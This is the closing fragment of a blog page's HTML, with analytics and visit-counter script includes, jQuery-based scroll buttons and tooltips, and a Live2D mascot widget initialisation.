	  hm.src = "//hm.baidu.com/hm.js?xxxxxx";
	  var s = document.getElementsByTagName("script")[0]; 
	  s.parentNode.insertBefore(hm, s);
	})();
	</script>



<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>


<script src="//cdn.bootcss.com/jquery/1.11.1/jquery.min.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(
            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>